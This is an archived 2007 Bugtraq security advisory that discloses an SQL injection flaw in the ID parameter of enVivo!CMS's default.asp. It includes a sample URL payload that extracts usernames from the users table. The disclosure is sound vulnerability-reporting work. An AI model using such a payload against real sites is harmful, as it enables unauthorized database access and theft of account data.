OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
durito: enVivo!CMS SQL injection

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Wed Jul 11 2007 - 03:29:32 CDT


Dear bugtraqsecurityfocus.com,

  durito [damagelab] -durito[at]mail[dot]ru- reported SQL injection
  vulnerability in enVivo!CMS through ID parameter of default.asp.

  Example:

  http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--

  Original message (in Russian): http://securityvulns.ru/Rdocument425.html

--
http://securityvulns.com/
         /\_/\
        { , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/